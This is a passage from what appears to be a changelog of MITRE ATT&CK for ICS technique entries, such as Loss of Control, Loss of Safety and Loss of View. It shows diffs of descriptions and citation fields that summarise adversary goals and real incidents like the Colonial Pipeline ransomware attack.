descriptionAdversaries may gain access into industrial environments through systems exposed directly to the internet for remote access rather than through External Remote Services. Internet Accessible Devices are exposed to the internet unintentionally or intentionally without adequate protections. This may allow for adversaries to move directly into the control system network. Access onto these devices is accomplished without the use of exploits, these would be represented within the Exploit Public-Facing Application technique. Adversaries may leverage built in functions for remote access which may not be protected or utilize minimal legacy protections that may be targeted.(Citation: Bowman Dam - ICS-CERT) In the case of the Bowman dam incident, adversaries leveraged access to the dam control network through a cellular modem. Access to the device was protected by password authentication, although the application was vulnerable to brute forcing.(Citation: Bowman Dam - ICS-CERT)(Citation: Bowman Dam - wall street journal)(Citation: owman Dam - Times) In Trend Micro’s manufacturing deception operations adversaries were detected leveraging direct internet access to an ICS environment through the exposure of operational protocols such as Siemens S7, Omron FINS, and EtherNet/IP, in addition to misconfigured VNC access.(Citation: Trend Micro Honeypot)Adversaries may gain access into industrial environments through systems exposed directly to the internet for remote access rather than through [External Remote Services](https://attack.mitre.org/techniques/T0822). Internet Accessible Devices are exposed to the internet unintentionally or intentionally without adequate protections. This may allow for adversaries to move directly into the control system network. Access onto these devices is accomplished without the use of exploits, these would be represented within the [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T0819) technique. Adversaries may leverage built in functions for remote access which may not be protected or utilize minimal legacy protections that may be targeted. (Citation: NCCIC January 2014) These services may be discoverable through the use of online scanning tools. In the case of the Bowman dam incident, adversaries leveraged access to the dam control network through a cellular modem. Access to the device was protected by password authentication, although the application was vulnerable to brute forcing. (Citation: NCCIC January 2014) (Citation: Danny Yadron December 2015) (Citation: Mark Thompson March 2016) In Trend Micros manufacturing deception operations adversaries were detected leveraging direct internet access to an ICS environment through the exposure of operational protocols such as Siemens S7, Omron FINS, and EtherNet/IP, in addition to misconfigured VNC access. (Citation: Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0883https://attack.mitre.org/techniques/T0883
external_references[1]['source_name']Bowman Dam - ICS-CERTDanny Yadron December 2015
external_references[1]['description']NCCIC. (2014, January 1). Internet Accessible Control Systems At Risk. Retrieved November 7, 2019.Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07
external_references[1]['url']https://www.us-cert.gov/sites/default/files/Monitors/ICS-CERT%20Monitor%20Jan-April2014.pdfhttps://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559
external_references[2]['source_name']Bowman Dam - wall street journalMark Thompson March 2016
external_references[2]['description']Danny Yadron. (2015, December 20). Iranian Hackers Infiltrated New York Dam in 2013. Retrieved November 7, 2019.Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07
external_references[2]['url']https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559https://time.com/4270728/iran-cyber-attack-dam-fbi/
external_references[3]['source_name']Bowman Dam - TimesNCCIC January 2014
external_references[3]['description']Mark Thompson. (2016, March 24). Iranian Cyber Attack on New York Dam Shows Future of War. Retrieved November 7, 2019.NCCIC 2014, January 1 Internet Accessible Control Systems At Risk Retrieved. 2019/11/07
external_references[3]['url']https://time.com/4270728/iran-cyber-attack-dam-fbi/https://www.us-cert.gov/sites/default/files/Monitors/ICS-CERT_Monitor_Jan-April2014.pdf
external_references[4]['source_name']Trend Micro HoneypotStephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler
external_references[4]['description']Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rösler, and Rainer Vosseler. (n.d.). Caught in the Act: Running a Realistic Factory Honeypot to Capture Real Threats. Retrieved April 12, 2021.Stephen Hilt, Federico Maggi, Charles Perine, Lord Remorin, Martin Rsler, and Rainer Vosseler Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 Caught in the Act: Running a Realistic Factory Honeypot to Capture Real Threats Retrieved. 2021/04/12

[T0826] Loss of Availability

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may attempt to disrupt essential components or st1Adversaries may attempt to disrupt essential components or s
>ystems to prevent owner and operator from delivering product>ystems to prevent owner and operator from delivering product
>s or services. (Citation: Reference - Corero) (Citation: Ref>s or services. (Citation: Corero) (Citation: Michael J. Assa
>erence - SANS - 201510) (Citation: Reference - RIoT)   Adver>nte and Robert M. Lee) (Citation: Tyson Macaulay)   Adversar
>saries may leverage malware to delete or encrypt critical da>ies may leverage malware to delete or encrypt critical data 
>ta on HMIs, workstations, or databases. In the 2021 Colonial>on HMIs, workstations, or databases.  In the 2021 Colonial P
> Pipeline ransomware incident, pipeline operations were temp>ipeline ransomware incident, pipeline operations were tempor
>orally halted on May 7th and were not fully restarted until >ally halted on May 7th and were not fully restarted until Ma
>May 12th.>y 12th. (Citation: Colonial Pipeline Company May 2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
external_referenceshttps://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-19 14:36:34.715000+00:00
descriptionAdversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. (Citation: Reference - Corero) (Citation: Reference - SANS - 201510) (Citation: Reference - RIoT) Adversaries may leverage malware to delete or encrypt critical data on HMIs, workstations, or databases. In the 2021 Colonial Pipeline ransomware incident, pipeline operations were temporally halted on May 7th and were not fully restarted until May 12th.Adversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) Adversaries may leverage malware to delete or encrypt critical data on HMIs, workstations, or databases. In the 2021 Colonial Pipeline ransomware incident, pipeline operations were temporally halted on May 7th and were not fully restarted until May 12th. (Citation: Colonial Pipeline Company May 2021)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0826https://attack.mitre.org/techniques/T0826
external_references[1]['source_name']Reference - CoreroColonial Pipeline Company May 2021
external_references[1]['description']Corero. (n.d.). Industrial Control System (ICS) Security. Retrieved November 4, 2019.Colonial Pipeline Company 2021, May Media Statement Update: Colonial Pipeline System Disruption Retrieved. 2021/10/08
external_references[1]['url']https://www.corero.com/resources/files/whitepapers/cns%20whitepaper%20ics.pdfhttps://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption
external_references[2]['source_name']Reference - SANS - 201510Corero
external_references[2]['description']Michael J. Assante and Robert M. Lee. (n.d.). The Industrial Control System Cyber Kill Chain. Retrieved November 4, 2019.Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04
external_references[2]['url']https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf
external_references[3]['source_name']Reference - RIoTMichael J. Assante and Robert M. Lee
external_references[3]['description']Tyson Macaulay. (n.d.). RIoT Control: Understanding and Managing Risks and the Internet of Things. Retrieved November 4, 2019.Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04
x_mitre_platforms[0]WindowsNone
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Tyson Macaulay', 'description': 'Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ', 'url': 'https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false'}

[T0827] Loss of Control

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may seek to achieve a sustained loss of control t1Adversaries may seek to achieve a sustained loss of control 
>or a runaway condition in which operators cannot issue any c>or a runaway condition in which operators cannot issue any c
>ommands even if the malicious interference has subsided.(Cit>ommands even if the malicious interference has subsided. (Ci
>ation: Reference - Corero)(Citation: Reference - SANS - 2015>tation: Corero) (Citation: Michael J. Assante and Robert M. 
>10)(Citation: Reference - RIoT) The German Federal Office fo>Lee) (Citation: Tyson Macaulay)  The German Federal Office f
>r Information Security (BSI) reported a targeted attack on a>or Information Security (BSI) reported a targeted attack on 
> steel mill in its 2014 IT Security Report.(Citation: BSI IT>a steel mill in its 2014 IT Security Report.(Citation: BSI S
> Security Situation 2014) These targeted attacks affected in>tate of IT Security 2014) These targeted attacks affected in
>dustrial operations and resulted in breakdowns of control sy>dustrial operations and resulted in breakdowns of control sy
>stem components and even entire installations. As a result o>stem components and even entire installations. As a result o
>f these breakdowns, massive impact resulted in damage and un>f these breakdowns, massive impact resulted in damage and un
>safe conditions from the uncontrolled shutdown of a blast fu>safe conditions from the uncontrolled shutdown of a blast fu
>rnace.>rnace.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002022-09-19 14:38:06.130000+00:00
descriptionAdversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided.(Citation: Reference - Corero)(Citation: Reference - SANS - 201510)(Citation: Reference - RIoT) The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill in its 2014 IT Security Report.(Citation: BSI IT Security Situation 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact resulted in damage and unsafe conditions from the uncontrolled shutdown of a blast furnace.Adversaries may seek to achieve a sustained loss of control or a runaway condition in which operators cannot issue any commands even if the malicious interference has subsided. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill in its 2014 IT Security Report.(Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact resulted in damage and unsafe conditions from the uncontrolled shutdown of a blast furnace.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0827https://attack.mitre.org/techniques/T0827
external_references[1]['source_name']Reference - CoreroBSI State of IT Security 2014
external_references[1]['description']Corero. (n.d.). Industrial Control System (ICS) Security. Retrieved November 4, 2019.Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30
external_references[1]['url']https://www.corero.com/resources/files/whitepapers/cns%20whitepaper%20ics.pdfhttps://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3
external_references[2]['source_name']Reference - SANS - 201510Corero
external_references[2]['description']Michael J. Assante and Robert M. Lee. (n.d.). The Industrial Control System Cyber Kill Chain. Retrieved November 4, 2019.Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04
external_references[2]['url']https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf
external_references[3]['source_name']Reference - RIoTMichael J. Assante and Robert M. Lee
external_references[3]['description']Tyson Macaulay. (n.d.). RIoT Control: Understanding and Managing Risks and the Internet of Things. Retrieved November 4, 2019.Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04
external_references[3]['url']https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=falsehttps://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297
external_references[4]['source_name']BSI IT Security Situation 2014Tyson Macaulay
external_references[4]['description']Bundesamt für Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security). (2014). Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany). Retrieved October 30, 2019.Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04
external_references[4]['url']https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false

[T0828] Loss of Productivity and Revenue

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may cause loss of productivity and revenue throut1Adversaries may cause loss of productivity and revenue throu
>gh disruption and even damage to the availability and integr>gh disruption and even damage to the availability and integr
>ity of control system operations, devices, and related proce>ity of control system operations, devices, and related proce
>sses. This technique may manifest as a direct effect of an I>sses. This technique may manifest as a direct effect of an I
>CS-targeting attack or tangentially, due to an IT-targeting >CS-targeting attack or tangentially, due to an IT-targeting 
>attack against non-segregated environments.  In cases where >attack against non-segregated environments.   In cases where
>these operations or services are brought to a halt, the loss> these operations or services are brought to a halt, the los
> of productivity may eventually present an impact for the en>s of productivity may eventually present an impact for the e
>d-users or consumers of products and services. The disrupted>nd-users or consumers of products and services. The disrupte
> supply-chain may result in supply shortages and increased p>d supply-chain may result in supply shortages and increased 
>rices, among other consequences.  A ransomware attack on an >prices, among other consequences.   A ransomware attack on a
>Australian beverage company resulted in the shutdown of some>n Australian beverage company resulted in the shutdown of so
> manufacturing sites, including precautionary halts to prote>me manufacturing sites, including precautionary halts to pro
>ct key systems. (Citation: Distrupted Operations at Lion Com>tect key systems. (Citation: Paganini, Pierluigi June 2020) 
>pany June 2020) The company announced the potential for temp>The company announced the potential for temporary shortages 
>orary shortages of their products following the attack. (Cit>of their products following the attack. (Citation: Paganini,
>ation: Distrupted Operations at Lion Company June 2020) (Cit> Pierluigi June 2020) (Citation: Lion Corporation June 2020)
>ation: Lion Cyber Incident June 2020)  In the 2021 Colonial >   In the 2021 Colonial Pipeline ransomware incident, the pi
>Pipeline ransomware incident, the pipeline was unable to tra>peline was unable to transport approximately 2.5 million bar
>nsport approximately 2.5 million barrels of fuel per day to >rels of fuel per day to the East Coast.  (Citation: Colonial
>the East Coast. (Citation: Colonial Pipeline System Distrupt> Pipeline Company May 2021)
>ion May 2021) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 15:25:32.143000+00:002022-09-20 19:31:11.106000+00:00
descriptionAdversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments. In cases where these operations or services are brought to a halt, the loss of productivity may eventually present an impact for the end-users or consumers of products and services. The disrupted supply-chain may result in supply shortages and increased prices, among other consequences. A ransomware attack on an Australian beverage company resulted in the shutdown of some manufacturing sites, including precautionary halts to protect key systems. (Citation: Distrupted Operations at Lion Company June 2020) The company announced the potential for temporary shortages of their products following the attack. (Citation: Distrupted Operations at Lion Company June 2020) (Citation: Lion Cyber Incident June 2020) In the 2021 Colonial Pipeline ransomware incident, the pipeline was unable to transport approximately 2.5 million barrels of fuel per day to the East Coast. (Citation: Colonial Pipeline System Distruption May 2021)Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments. In cases where these operations or services are brought to a halt, the loss of productivity may eventually present an impact for the end-users or consumers of products and services. The disrupted supply-chain may result in supply shortages and increased prices, among other consequences. A ransomware attack on an Australian beverage company resulted in the shutdown of some manufacturing sites, including precautionary halts to protect key systems. (Citation: Paganini, Pierluigi June 2020) The company announced the potential for temporary shortages of their products following the attack. (Citation: Paganini, Pierluigi June 2020) (Citation: Lion Corporation June 2020) In the 2021 Colonial Pipeline ransomware incident, the pipeline was unable to transport approximately 2.5 million barrels of fuel per day to the East Coast. (Citation: Colonial Pipeline Company May 2021)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0828https://attack.mitre.org/techniques/T0828
external_references[1]['source_name']Distrupted Operations at Lion Company June 2020Colonial Pipeline Company May 2021
external_references[1]['description']Paganini, Pierluigi. (2020, June 14). Ransomware attack disrupts operations at Australian beverage company Lion. Retrieved October 8, 2021.Colonial Pipeline Company 2021, May Media Statement Update: Colonial Pipeline System Disruption Retrieved. 2021/10/08
external_references[1]['url']https://securityaffairs.co/wordpress/104749/cyber-crime/ransomware-attack-hit-lion.htmlhttps://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption
external_references[2]['source_name']Lion Cyber Incident June 2020Lion Corporation June 2020
external_references[2]['description']Lion Corporation. (2020, June 26). Lion Cyber incident update: 26 June 2020. Retrieved October 8, 2021.Lion Corporation 2020, June 26 Lion Cyber incident update: 26 June 2020 Retrieved. 2021/10/08
external_references[3]['source_name']Colonial Pipeline System Distruption May 2021Paganini, Pierluigi June 2020
external_references[3]['description']Colonial Pipeline Company. (2021, May). Media Statement Update: Colonial Pipeline System Disruption. Retrieved October 8, 2021.Paganini, Pierluigi 2020, June 14 Ransomware attack disrupts operations at Australian beverage company Lion Retrieved. 2021/10/08
external_references[3]['url']https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruptionhttps://securityaffairs.co/wordpress/104749/cyber-crime/ransomware-attack-hit-lion.html

[T0837] Loss of Protection

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may compromise protective system functions desigt1Adversaries may compromise protective system functions desig
>ned to prevent the effects of faults and abnormal conditions>ned to prevent the effects of faults and abnormal conditions
>. This can result in equipment damage, prolonged process dis>. This can result in equipment damage, prolonged process dis
>ruptions and hazards to personnel. Many faults and abnormal >ruptions and hazards to personnel.   Many faults and abnorma
>conditions in process control happen too quickly for a human>l conditions in process control happen too quickly for a hum
> operator to react to. Speed is critical in correcting these>an operator to react to. Speed is critical in correcting the
> conditions to limit serious impacts such as Loss of Control>se conditions to limit serious impacts such as Loss of Contr
> and Property Damage. Adversaries may target and disable pro>ol and Property Damage.   Adversaries may target and disable
>tective system functions as a prerequisite to subsequent att> protective system functions as a prerequisite to subsequent
>ack execution or to allow for future faults and abnormal con> attack execution or to allow for future faults and abnormal
>ditions to go unchecked. Detection of a Loss of Protection b> conditions to go unchecked. Detection of a Loss of Protecti
>y operators can result in the shutdown of a process due to s>on by operators can result in the shutdown of a process due 
>trict policies regarding protection systems. This can cause >to strict policies regarding protection systems. This can ca
>a Loss of Productivity and Revenue and may meet the technica>use a Loss of Productivity and Revenue and may meet the tech
>l goals of adversaries seeking to cause process disruptions.>nical goals of adversaries seeking to cause process disrupti
 >ons.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 07:57:26.506000+00:002022-09-19 14:40:19.570000+00:00
descriptionAdversaries may compromise protective system functions designed to prevent the effects of faults and abnormal conditions. This can result in equipment damage, prolonged process disruptions and hazards to personnel. Many faults and abnormal conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. Adversaries may target and disable protective system functions as a prerequisite to subsequent attack execution or to allow for future faults and abnormal conditions to go unchecked. Detection of a Loss of Protection by operators can result in the shutdown of a process due to strict policies regarding protection systems. This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.Adversaries may compromise protective system functions designed to prevent the effects of faults and abnormal conditions. This can result in equipment damage, prolonged process disruptions and hazards to personnel. Many faults and abnormal conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. Adversaries may target and disable protective system functions as a prerequisite to subsequent attack execution or to allow for future faults and abnormal conditions to go unchecked. Detection of a Loss of Protection by operators can result in the shutdown of a process due to strict policies regarding protection systems. This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0837https://attack.mitre.org/techniques/T0837

[T0880] Loss of Safety

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may compromise safety system functions designed t1Adversaries may compromise safety system functions designed 
>to maintain safe operation of a process when unacceptable or>to maintain safe operation of a process when unacceptable or
> dangerous conditions occur. Safety systems are often compos> dangerous conditions occur. Safety systems are often compos
>ed of the same elements as control systems but have the sole>ed of the same elements as control systems but have the sole
> purpose of ensuring the process fails in a predetermined sa> purpose of ensuring the process fails in a predetermined sa
>fe manner. Many unsafe conditions in process control happen >fe manner.   Many unsafe conditions in process control happe
>too quickly for a human operator to react to. Speed is criti>n too quickly for a human operator to react to. Speed is cri
>cal in correcting these conditions to limit serious impacts >tical in correcting these conditions to limit serious impact
>such as Loss of Control and Property Damage. Adversaries may>s such as Loss of Control and Property Damage.   Adversaries
> target and disable safety system functions as a prerequisit> may target and disable safety system functions as a prerequ
>e to subsequent attack execution or to allow for future unsa>isite to subsequent attack execution or to allow for future 
>fe conditionals to go unchecked. Detection of a Loss of Safe>unsafe conditionals to go unchecked. Detection of a Loss of 
>ty by operators can result in the shutdown of a process due >Safety by operators can result in the shutdown of a process 
>to strict policies regarding safety systems. This can cause >due to strict policies regarding safety systems. This can ca
>a Loss of Productivity and Revenue and may meet the technica>use a Loss of Productivity and Revenue and may meet the tech
>l goals of adversaries seeking to cause process disruptions.>nical goals of adversaries seeking to cause process disrupti
 >ons.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 07:57:26.506000+00:002022-09-19 14:41:41.466000+00:00
descriptionAdversaries may compromise safety system functions designed to maintain safe operation of a process when unacceptable or dangerous conditions occur. Safety systems are often composed of the same elements as control systems but have the sole purpose of ensuring the process fails in a predetermined safe manner. Many unsafe conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. Adversaries may target and disable safety system functions as a prerequisite to subsequent attack execution or to allow for future unsafe conditionals to go unchecked. Detection of a Loss of Safety by operators can result in the shutdown of a process due to strict policies regarding safety systems. This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.Adversaries may compromise safety system functions designed to maintain safe operation of a process when unacceptable or dangerous conditions occur. Safety systems are often composed of the same elements as control systems but have the sole purpose of ensuring the process fails in a predetermined safe manner. Many unsafe conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. Adversaries may target and disable safety system functions as a prerequisite to subsequent attack execution or to allow for future unsafe conditionals to go unchecked. Detection of a Loss of Safety by operators can result in the shutdown of a process due to strict policies regarding safety systems. This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0880https://attack.mitre.org/techniques/T0880

[T0829] Loss of View

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may cause a sustained or permanent loss of view t1Adversaries may cause a sustained or permanent loss of view 
>where the ICS equipment will require local, hands-on operato>where the ICS equipment will require local, hands-on operato
>r intervention; for instance, a restart or manual operation.>r intervention; for instance, a restart or manual operation.
> By causing a sustained reporting or visibility loss, the ad> By causing a sustained reporting or visibility loss, the ad
>versary can effectively hide the present state of operations>versary can effectively hide the present state of operations
>. This loss of view can occur without affecting the physical>. This loss of view can occur without affecting the physical
> processes themselves. (Citation: Reference - Corero) (Citat> processes themselves. (Citation: Corero) (Citation: Michael
>ion: Reference - SANS - 201510) (Citation: Reference - RIoT)> J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
external_referenceshttps://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 07:57:26.506000+00:002022-10-24 15:09:07.609000+00:00
descriptionAdversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation. By causing a sustained reporting or visibility loss, the adversary can effectively hide the present state of operations. This loss of view can occur without affecting the physical processes themselves. (Citation: Reference - Corero) (Citation: Reference - SANS - 201510) (Citation: Reference - RIoT)Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation. By causing a sustained reporting or visibility loss, the adversary can effectively hide the present state of operations. This loss of view can occur without affecting the physical processes themselves. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0829https://attack.mitre.org/techniques/T0829
external_references[1]['source_name']Reference - CoreroCorero
external_references[1]['description']Corero. (n.d.). Industrial Control System (ICS) Security. Retrieved November 4, 2019.Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04
external_references[1]['url']https://www.corero.com/resources/files/whitepapers/cns%20whitepaper%20ics.pdfhttps://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf
external_references[2]['source_name']Reference - SANS - 201510Michael J. Assante and Robert M. Lee
external_references[2]['description']Michael J. Assante and Robert M. Lee. (n.d.). The Industrial Control System Cyber Kill Chain. Retrieved November 4, 2019.Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04
external_references[3]['source_name']Reference - RIoTTyson Macaulay
external_references[3]['description']Tyson Macaulay. (n.d.). RIoT Control: Understanding and Managing Risks and the Internet of Things. Retrieved November 4, 2019.Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04

[T0831] Manipulation of Control

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may manipulate physical process control within tt1Adversaries may manipulate physical process control within t
>he industrial environment. Methods of manipulating control c>he industrial environment. Methods of manipulating control c
>an include changes to set point values, tags, or other param>an include changes to set point values, tags, or other param
